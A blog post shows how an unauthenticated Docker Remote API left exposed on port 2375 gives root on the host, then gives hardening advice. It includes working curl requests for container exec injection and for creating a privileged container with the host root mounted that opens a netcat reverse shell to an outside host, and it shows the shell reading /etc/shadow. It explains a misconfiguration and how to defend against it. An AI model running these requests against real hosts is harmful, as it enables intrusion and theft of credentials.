Owning system through an exposed Docker interface


About a good year ago I wanted to understand what was this hype surrounding Docker all about. I started playing with containers, resource management and automated deployment. Eventually I felt that the management tool (ideally Web-based) would come in handy, especially when testing new containers and demoing some of the Docker’s cool features to my colleagues. I found Shipyard project, which seemed to be exactly what I was looking for. It included automated deployment script which sets up an entire Docker cluster with one “curl | bash” command. Now that’s absolutely beside the point but such practice is usually a poor sign of security awareness, see this article for more details on how this can be exploited even when user wishes to validate script being served.

We’re going to replicate these steps on a fresh Ubuntu 16.04 VM. First we’ll make sure we have docker-engine package installed from the official Docker repository. Then we’ll run Shipyard’s automatic deployment:

pat@pat-virtual-machine:~$ sudo curl -sSL https://shipyard-project.com/deploy | sudo bash -s
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
3690ec4760f9: Pulling fs layer
3690ec4760f9: Verifying Checksum
3690ec4760f9: Download complete
3690ec4760f9: Pull complete
...
Status: Downloaded newer image for shipyard/shipyard:latest
Waiting for Shipyard on opendocker.host:8080
.......
Shipyard available at http://opendocker.host:8080
Username: admin Password: shipyard
pat@pat-virtual-machine:~$ 

Simple as that. We’ve got the Shipyard running and ready to use, of course next step is to change our default credentials to something more secure and then we can begin experimenting with containers. Documentation doesn’t mention any important post-deployment steps apart from a recommendation to use TLS for an exposed Docker engine port 2375/tcp. However this doesn’t necessarily imply the use of TLS client-side certificates for many, which means that we’re possibly leaving the Docker Remote API on an external network interface accessible to anyone. Shipyard exposes this by using a lightweight container which simply forwards requests from an open TCP port to the mounted default Docker UNIX socket at /var/run/docker.sock. Having a Docker socket exposed to an untrusted environment is effectively the same as having a root access to the machine and we’re going to see that shortly. First of all Docker official documentation warns against that but Docker itself makes it very easy to perform such misconfiguration. There are several other projects and perhaps many more publicly available containers that require direct access to a Docker API socket. Security breach in such container provides an easy access to the host system. Bottom line here is that you should never expose Docker socket, not even to a container.

Being somewhat curious I left our Docker sandbox machine running, so far this misconfiguration has been successfully exploited several times. Both times server has been used to perform DDoS attacks in the end. Initial exploitation is fairly easy, all you need to do is to use /containers/(id or name)/exec endpoint and inject an arbitrary command (Exec), i.e:

$ curl -X POST -H "Content-Type: application/json" http://opendocker.host:2375/containers/f39b4b1ba13f/exec -d '{"Cmd": ["/bin/sh", "-c", "echo h4ck3d > /lol.txt; sleep 20"]}'
{ "Id": "f90e34656806", "Warnings":[] }
$ curl -X POST -H "Content-Type: application/json" http://opendocker.host:2375/exec/f90e34656806/start -d '{}'

However during the second exploitation malware was planted into the host machine. Turns out that the breakout can also be easily accomplished by using Docker’s Remote API, all you need to do is to create a new container with host’s root filesystem mount, then you’re free to make any system-wide modifications on the host:

$ curl -X POST -H "Content-Type: application/json" http://opendocker.host/containers/create?name=backd00r -d '{"Image":"alpine", "Cmd":["/usr/bin/nc", "my.ip", "1234", "-e", "/bin/sh"], "Binds": [ "/:/mnt" ], "Privileged": true}'
{"Id":"6a1be4a3e9d3551f10ac9bfbea66022dfce42b033553891751c31e76e43b9d5c","Warnings":null}
$ curl -X POST -H "Content-Type: application/json" http://opendocker.host:2375/containers/backd00r/start?name=backd00r

Reverse shell on my.ip:

patrikas@my.ip:~$ nc -vlp 1234
listening on [any] 1234 ...
opendocker.host: inverse host lookup failed: Unknown host
connect to [my.ip] from (UNKNOWN) [opendocker.host] 35733
id 
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
head /mnt/etc/shadow
root:!:17133:0:99999:7:::
...

Now this can easily be turned to a profit. Both exploitation attempts seemed to be triggered by bots, presumably scanning internet for open 2375/tcp ports. Relevant information can also be extracted by crawling Github or even search engines, looking for keywords/patterns such as “/var/run/docker.sock:/var/run/docker.sock”.

If you want to secure yourself first of all please make sure that dockerd itself is using a local UNIX socket and not anything else, unless you know what you’re doing. If you need to bind Docker to a HTTP socket then authentication (TLS) must be used. Also you should review your containers in deployment and make sure that the Docker socket is not exposed to any of them (you can use docker inspect for that), otherwise you should treat such container responsibly as privileged, having superuser access to the system.